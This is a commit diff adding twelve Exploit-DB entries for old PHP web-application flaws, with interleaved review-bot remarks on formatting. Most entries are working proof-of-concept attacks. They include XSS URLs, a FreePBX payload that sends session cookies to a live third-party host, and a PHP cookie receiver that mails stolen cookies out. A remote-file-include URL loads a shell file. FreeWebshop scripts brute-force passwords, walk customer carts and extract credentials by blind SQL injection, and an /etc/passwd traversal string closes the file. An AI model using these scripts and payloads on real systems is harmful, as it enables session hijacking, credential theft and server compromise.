Updated 05_22_2014

Offensive Security 2014-05-22 04:36:28 +00:00
parent 9d5f6d827f
commit 5b5e154bd7
13 changed files with 260 additions and 0 deletions


@ -30123,3 +30123,15 @@ id,file,description,date,author,platform,type,port
33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 'MSP' Script Cross Site Scripting Vulnerability",2009-12-23,"Floyd Fuh",multiple,webapps,0
33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 'myps.php' Cross Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-12-28,MustLive,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0
33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 'admin.php' Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
33446,platforms/php/webapps/33446.txt,"Barbo91 'upload.php' Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
33447,platforms/php/webapps/33447.php,"FreeWebshop 2.2.9 R2 Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0
33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 'l' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0
33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 Cross Site Scripting and Authentication Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 'recent.php' Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33452,platforms/php/webapps/33452.txt,"Imagevue r16 'amount' Parameter Cross-Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
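Review bot: the twelve new rows (33441 through 33452; the first three rows are context) spell the same vulnerability class three ways, "Cross Site Scripting", "Cross-Site Scripting" and "XSS" (33442/33443), and the description column is what people search, so one form such as "Cross-Site Scripting Vulnerability" would be worth normalising before this lands. Also note that 33447 is the only `.php` entry in the batch while its file is mostly advisory text; if the type column is meant to say "runs as-is", that row is the odd one out.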



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37479/info
The Joomulus component for Joomla! is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3 E%3C/tags%3E
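Review bot: the PoC URL contains a stray space in `%3C/a%3 E` near the end (most likely a wrap artifact from pasting), which breaks the percent-encoding of the closing `</a>`; drop the space so the stored line is at least well-formed. The entry also omits the affected-version line that the other files in this commit carry, even though files.csv lists the component as Joomulus 2.0; a "Joomulus 2.0 is vulnerable; other versions may also be affected." line would bring it in line with the rest.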

platforms/php/webapps/33442.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37482/info
FreePBX is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FreePBX 2.5.2 is vulnerable; other versions may also be affected.
location.href='https://www.example.com/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E
%3Cscript%20src%3Dhttp%3A//global-evolution.info/etc/grep.php%3E%3C/script%3E?nice='+escape(document.cookie)
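Review bot: the PoC is a JavaScript statement (`location.href='...'`), not a bare URL, and it is split across two lines in the middle of the string literal (after `%3C/script%3E%20%22%3E`), so as stored it is an unterminated string; the two lines should be joined, or the entry should say it is a wrapped single line. It also loads a script from the live third-party host `global-evolution.info` and sends the cookie there; for an archive entry that host should be an example.com placeholder, as every other file in this commit does. A sentence stating that the reflected input is the `tech` parameter of `admin/config.php?display=trunks` (which is what files.csv says) would make the entry self-describing for anyone writing a log search or WAF rule.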

platforms/php/webapps/33443.txt Executable file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/37482/info
FreePBX is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
FreePBX 2.5.2 is vulnerable; other versions may also be affected.
<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("notification@global-evolution.info", $subject, $msg);
header ("location: http://127.0.0.1:8080/admin/");
?>
<form name="editZapchandid" action="" method="post" onsubmit="return checkZapchandid(editZapchandid);">
<input type="hidden" name="extdisplay" value="">
<input type="hidden" name="channel" value="">
<input type="hidden" name="action" value="add">
<table><tr><td colspan="2"><h5>Add Channel<hr></h5></td></tr>
<tr><td><a href="#" class="info">Channel:<span>The Zap Channel number to map to a DID</span></a></td>
<td><input size="5" type="text" name="channel" value="" tabindex="1"></td>
</tr><tr><td><a href="#" class="info">Description:<span>A useful description describing this channel</span></a></td>
<td><input size="40" type="text" name="description" value="INSERT 0WN SCRIPTCODE HERE!!!" tabindex="2"></td>
</tr><tr><td><a href="#" class="info">DID:<span>The DID that this channel represents. The incoming call on this channel
will be treated as if it came in with this DID and can be managed with Inbound Routing on DIDs</span></a></td>
<td><input size="40" type="text" name="did" value="" tabindex="3"/></td>
</tr><tr><td colspan="2"><br><input name="Submit" type="submit" value="Submit Changes" tabindex="4">
</td></tr></table></form>
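Review bot: this file glues two unrelated pieces together with no explanatory text: a PHP cookie receiver (the `<?` ... `?>` block) and an HTML copy of the FreePBX "Add Channel" form with `INSERT 0WN SCRIPTCODE HERE!!!` in the `description` field. The receiver uses the `<?` short open tag, which only works when `short_open_tag` is enabled, and `$msg` has `\Time:` where `\nTime:` was evidently meant, so the timestamp runs into the IP line; it also mails to a real address at global-evolution.info and redirects to `127.0.0.1:8080/admin/`, both of which should be placeholders. The form has `action=""` and the text never names the affected page, so what files.csv calls the "Zap Channel Addition Description Parameter XSS" is not actually documented here; the affected page and the `description` parameter should be stated in prose, as the other entries in this commit do for their parameters.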


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37498/info
DrBenHur.com DBHcms is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
DBHcms 1.1.4 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00
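Review bot: the PoC depends on two preconditions it does not state: the trailing `%00` truncating whatever the application appends to `dbhcms_core_dir`, and the server being configured to include remote URLs at all. Both are exactly the things a defender can verify or switch off, so they belong in the text next to the version line. `http://www.example.org/shell.txt` is an appropriate placeholder and should stay as it is.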


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37502/info
phpInstantGallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpInstantGallery 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/instantgallery/admin.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
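Review bot: the payload here rides in the extra path segment after `admin.php/`, not in a query parameter, but the description only says the script "fails to properly sanitize user-supplied input"; stating that the reflected value is the request path itself would tell a defender where to look in access logs and what to filter. The `<`, `>` and `"` characters are also left raw rather than percent-encoded, unlike 33448 through 33450 from the same author, which is a consistency nit.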

platforms/php/webapps/33446.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37512/info
Barbo91 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URIs are available:
http://www.example.com/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<script>alert(213771818860)</script>
http://www.example.com/barbo91_uploads/upload.php?MAX_FILE_SIZE=1024000&UploadedFile=1<img+src=http://server/Hack.jpg+onload=alert(213771818860)>
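Review bot: the second URI uses a bare `http://server/Hack.jpg` host where every other entry in this commit uses example.org or 127.0.0.1 placeholders; the `<img src=... onload=...>` variant should follow the same convention. Both URIs also pass `MAX_FILE_SIZE` and `UploadedFile` as GET parameters to what the summary calls an upload script, and the text does not say that the script reflects them from a GET request; that is the fact a WAF rule or log search would key on, so it should be spelled out.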

platforms/php/webapps/33447.php Executable file

@ -0,0 +1,114 @@
source: http://www.securityfocus.com/bid/37513/info
FreeWebshop is prone to multiple remote vulnerabilities:
1. A security vulnerability that may allow attackers to spoof HTTP headers.
2. A security vulnerability involving the handling of sessions.
3. A security vulnerability that may allow attackers to brute-force passwords.
4. A security-bypass vulnerability.
5. An SQL-injection vulnerability.
6. A directory-traversal vulnerability.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities, gain unauthorized access to the affected application, and obtain sensitive information.
FreeWebshop.org 2.2.9 R2 is vulnerable; other versions may also be affected.
<?php
$url = "http://127.0.0.1/index.php?page=cart&action=show";
$max = 1000;
for($customerid = 1; $customerid <= $max; $customerid++)
{
echo "<h3>Customerid: " . $customerid .
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
$result = curl_exec($ch);
curl_close($ch);
$result = str_replace("\n", "", $result);
preg_match("/(Wat zit er in uw winkelwagen.*)<\/table>/", $result,
$matches);
echo strip_tags($matches[1]);
}
?>
<?php
$url = "http://127.0.0.1/index.php?page=main";
$max = 1000;
$passwords = array("admin_1234", "admin", "password");
$ipspoof = "127.0.0.1";
for($customerid = 1; $customerid <= $max; $customerid++)
{
foreach($passwords as $password)
{
$cookie = "fws_cust=foobar-" . $customerid . "-" . md5(md5($password));
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-Forwarded-For: " .
$ipspoof . "\n"));
$result = curl_exec($ch);
curl_close($ch);
if(preg_match("/Persoonlijke pagina/", $result))
{
echo "Found password: " . $password . " for customerid: " .
$customerid . "<br>\n";
echo "Cookie: " . $cookie . "<br>\n";
}
}
}
?>
<?php
$url = "http://127.0.0.1/index.php?page=main";
$tablename = "fws_customer";
$fieldnames = array("LOGINNAME", "PASSWORD", "IP");
$userid = 1;
$loginname = "";
$password = "";
$ip = "";
foreach($fieldnames as $fieldname)
{
$index = 1;
echo $fieldname . ": ";
while(TRUE)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE,
"fws_cust=fubar-0)+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%
2CASCII(SUBSTRING(" .
$fieldname . "%2C" . $index . "%2C1))%2C8+FROM+" . $tablename .
"+WHERE+ID%3D" . $userid . "%2F*-md5");
$result = curl_exec($ch);
curl_close($ch);
preg_match("/Winkelwagen \((\d+)\)/", $result, $matches);
if(intval($matches[1]) == 0)
{
break;
}
switch($fieldname)
{
case "LOGINNAME":
$loginname .= chr($matches[1]);
break;
case "PASSWORD":
$password .= chr($matches[1]);
break;
case "IP":
$ip .= chr($matches[1]);
break;
}
echo chr($matches[1]);
$index++;
}
echo "<br>\n";
}
../../../../../../../etc/passwd%00
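Review bot: the file is listed as `.php` in files.csv but consists of advisory prose followed by three separate PHP scripts with no heading saying which of the six numbered issues each one demonstrates, and the third script never closes its `<?php` block before the dangling `../../../../../../../etc/passwd%00` line, which names no parameter at all; as stored, the file neither runs nor documents issues 2 and 4. The third script's cookie string is also broken across a line in the middle of the literal (`...%2C6%` / `2CASCII(...`), which would embed a newline in the cookie and is almost certainly a wrap artifact rather than intent. Suggest splitting the file into per-issue sections with a one-line description each (issue 1 for the `X-Forwarded-For` script, issue 2 for the `fws_guest` cart walk, issue 3/5 for the password loop and the `fws_cust` SQL string, issue 6 for the traversal string together with the parameter it applies to), and either joining the wrapped line or noting it.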


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37514/info
Azerbaijan Development AzDGDatingMedium is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/datingscript/login.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
http://www.example.com/datingscript/search.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
http://www.example.com/datingscript/index.php?l=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
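Review bot: the entry has no affected-version line although files.csv records it as AzDGDatingMedium 1.9.3 and the other indoushka entries in this commit (33449, 33450, 33451) carry one; add "AzDGDatingMedium 1.9.3 is vulnerable; other versions may also be affected." for consistency. The three URIs differ only by script name, so a single sentence saying the `l` parameter is reflected by login.php, search.php and index.php would read better than three near-identical lines, but that is a style point.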

platforms/php/webapps/33449.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37553/info
Conkurent PHPMyCart is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability.
An attacker may leverage these issues to gain unauthorized access to the affected application and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHPMyCart 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/sm-pmc13/sign_aff.php?pflag=add&name=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&email=indoushka%40example%2Ecom&addr=indoushka@example.com&submit=Submit
http://www.example.com/sm-pmc13/admin/indexa.php
http://www.example.com/sm-pmc13/admin/addn.php
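Review bot: the second and third PoC lines are bare URLs (`admin/indexa.php`, `admin/addn.php`) with no sentence explaining what the "authentication-bypass vulnerability" from the summary consists of, so a reader cannot tell whether they are meant as unauthenticated-access checks or something else; the XSS line at least names `sign_aff.php` and the `name` parameter. A one-line description per URL, as the summary promises two distinct issues, would make the entry usable for anyone checking whether their deployment is exposed.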

platforms/php/webapps/33450.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37554/info
SendStudio (also called Email Marketer) is prone to a cross-site scripting issue and a security-bypass issue.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site steal cookie-based authentication credentials and gain unauthorized administrative access to the affected application.
The vendor reports that Interspire Email Marketer 6 is not affected.
1- XSS (High)
http://www.example.com/wl-ssf41/admin/index.php/index?SID=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
2- Bay Pass (Medium)
http://www.example.com/wl-ssf41/admin/index.php/index?SID=xx
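Review bot: "2- Bay Pass (Medium)" should read "Bypass", and that item is just `index.php/index?SID=xx` with no explanation of how an arbitrary `SID` value leads to the "unauthorized administrative access" the summary claims, so the security-bypass half of the entry is undocumented. The text also only says Interspire Email Marketer 6 is not affected; the affected version (4.0.1 per files.csv, consistent with the `wl-ssf41` path) should be stated explicitly as the other entries do. Minor: the second sentence of the summary is missing a comma or "and" after "affected site".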

platforms/php/webapps/33451.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37555/info
BosClassifieds is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BosClassifieds 1.20 is vulnerable; other versions may also be affected.
http://www.example.com/sm-bc120/recent.php?type=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/sm-bc120/recent.php?type=<img+src=http://www.example.org/matrix.jpg+onload=alert(213771818860)>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37557/info
Imagevue is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue r16 is vulnerable; other versions may also be affected.
http://www.example.com/upload/admin/upload.php?amount=<img+src=http://127.0.0.1/dot.gif+onload=alert(213771818860)>&path=hacked%20by%20indoushka
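Review bot: the summary and files.csv attribute the XSS to the `amount` parameter, but the PoC also passes `path=hacked%20by%20indoushka`, and nothing says whether `path` is needed for the reflection or is decoration; if it is unrelated it should be dropped, and if it is part of the issue the description should say so. `127.0.0.1/dot.gif` as the image source is fine as a placeholder.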